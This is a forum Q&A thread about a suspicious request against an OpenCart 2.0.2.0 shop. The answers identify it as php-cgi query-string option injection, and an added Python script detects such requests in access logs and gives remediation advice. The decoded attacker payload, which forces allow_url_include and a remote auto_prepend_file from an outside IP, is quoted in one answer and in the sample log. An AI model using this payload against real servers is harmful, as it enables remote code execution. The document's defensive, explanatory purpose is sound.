PHP Security Failure

4

I noticed an unusual activity on my site (e-commerce opencart 2.0.2.0)

This is the command you used

link

I do not know exactly what it looks like: exploiting a PHP fault and inserting a backdoor. I have the code that was injected, or not yet, I do not know; apparently it deleted the text of the server it was on, but I made a copy if someone wants to analyze it. Let me know what I'm saying.

Now my question is: how do I know if his attack was successful, and how do I fix the problem?

asked by anonymous 03.02.2016 / 23:54

2 answers

2

This is a hacking attempt that relies on a PHP vulnerability in CGI mode where php-cgi receives the query string as command-line arguments, allowing options to be included via URL.

By decoding the URL you can read the settings that the attacker attempted to insert:

    -d allow_url_include=On -d auto_prepend_file=http://49.212.157.58/policy/r.txt

The -d option sets a new value for an INI entry, and if successful all PHP files would include (and execute) the remote file r.txt, which opens up many possibilities of what the attacker could do.

04.02.2016 / 12:10
1

Theoretically, judging by the code posted in the URL, they tried to make an attack where, using a possible allow_url_include enablement in php.ini, they tried to execute a command via the URL (I think in some previous versions of PHP there was this failure), which would cause the policy/r.txt file to be included in any PHP script automatically.

That is, if the attacker succeeded, it would probably be tragic for you.

Maybe what happened in this case is an attempt at an exploit.

It's worth remembering that just because they try to invade your system, it does not mean that they have been successful.

04.02.2016 / 11:45
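Both answers describe the same thing: a query string that php-cgi would parse as command-line options, with -d used to force allow_url_include and auto_prepend_file so that a remote file is pulled into every script. The script below is an added example (not code from the question or either answer) that URL-decodes request targets from web server access-log lines, recognises option-style query strings, and reports which INI settings were being forced and whether auto_prepend_file pointed at a remote URL. The log lines are constructed for the example (the 49.212.157.58 address is the one quoted in the thread; the client addresses are placeholders).

```python
"""
Detect php-cgi query-string option injection attempts in access logs.
Added example; not part of the original question or answers.
"""
import re
from urllib.parse import unquote_plus

# Constructed sample lines in Apache combined format. The second line carries
# the kind of request discussed in the thread: the query string is a php-cgi
# option list rather than key=value pairs. Client addresses are placeholders.
SAMPLE_LOG = """\
198.51.100.10 - - [03/Feb/2016:20:11:02 +0000] "GET /index.php?route=product/category&path=20 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.7 - - [03/Feb/2016:23:40:15 +0000] "POST /index.php?-d+allow_url_include%3dOn+-d+auto_prepend_file%3dhttp%3A%2F%2F49.212.157.58%2Fpolicy%2Fr.txt HTTP/1.1" 200 312 "-" "Mozilla/5.0"
198.51.100.10 - - [03/Feb/2016:23:41:00 +0000] "GET /index.php?route=product/search&search=-d+test HTTP/1.1" 200 4410 "-" "Mozilla/5.0"
"""

# Pull method, request target and status out of a combined-format line.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# INI entries that, when forced through -d, change what code PHP loads or what
# it is allowed to do. The first two are the ones named in the thread.
DANGEROUS_INI = ("allow_url_include", "auto_prepend_file", "auto_append_file",
                 "allow_url_fopen", "disable_functions", "safe_mode", "open_basedir")


def decode_query(target):
    """Return the URL-decoded query string of a request target ('' if none)."""
    _, sep, query = target.partition("?")
    return unquote_plus(query) if sep else ""


def parse_cgi_options(query):
    """Split a decoded query string into php-cgi style (flag, argument) pairs.

    A normal query looks like key=value&key=value. The injection only works
    when the whole query string starts with '-', because that is what makes
    php-cgi treat it as argv, so anything else is returned as no options.
    """
    if not query.startswith("-"):
        return []
    tokens = query.split()
    options = []
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        if tok == "-d" and i + 1 < len(tokens):      # "-d name=value"
            options.append(("-d", tokens[i + 1]))
            i += 2
        elif tok.startswith("-d") and len(tok) > 2:  # "-dname=value"
            options.append(("-d", tok[2:]))
            i += 1
        else:                                        # any other flag
            options.append((tok, None))
            i += 1
    return options


def analyze_line(line):
    """Classify one log line; returns None for ordinary traffic."""
    m = LOG_RE.search(line)
    if not m:
        return None
    options = parse_cgi_options(decode_query(m.group("target")))
    if not options:
        return None
    ini_settings = {}
    for flag, arg in options:
        if flag == "-d" and arg and "=" in arg:
            name, _, value = arg.partition("=")
            ini_settings[name] = value
    prepend = ini_settings.get("auto_prepend_file", "")
    return {
        "method": m.group("method"),
        "status": int(m.group("status")),
        "options": options,
        "dangerous_settings": sorted(n for n in ini_settings if n in DANGEROUS_INI),
        # A remote auto_prepend_file is the concrete backdoor vector from the thread.
        "remote_include": prepend if prepend.startswith(("http://", "https://", "ftp://")) else "",
    }


def scan_log(text):
    """Return one finding per log line that carries php-cgi option injection."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        result = analyze_line(line)
        if result:
            result["line"] = lineno
            findings.append(result)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['method']} status={f['status']} "
              f"forced={f['dangerous_settings']} remote_include={f['remote_include'] or '-'}")
```

A finding with a 200 status only shows that the request reached the application; it does not prove the include happened. Whether it could have depends on two things the script cannot see: whether PHP was running as CGI (check the "Server API" line of `php -i` or phpinfo(); mod_php and php-fpm do not take query strings as argv) and whether that PHP build still had the flaw. If the server was php-cgi, look for an outbound connection to the quoted address at the time of the request, for unexpected changes to PHP files compared with a clean OpenCart 2.0.2.0 release, and for auto_prepend_file or allow_url_include being set in the running configuration. The fix on the hosting side is to run a patched PHP (or a non-CGI SAPI) and keep allow_url_include=Off.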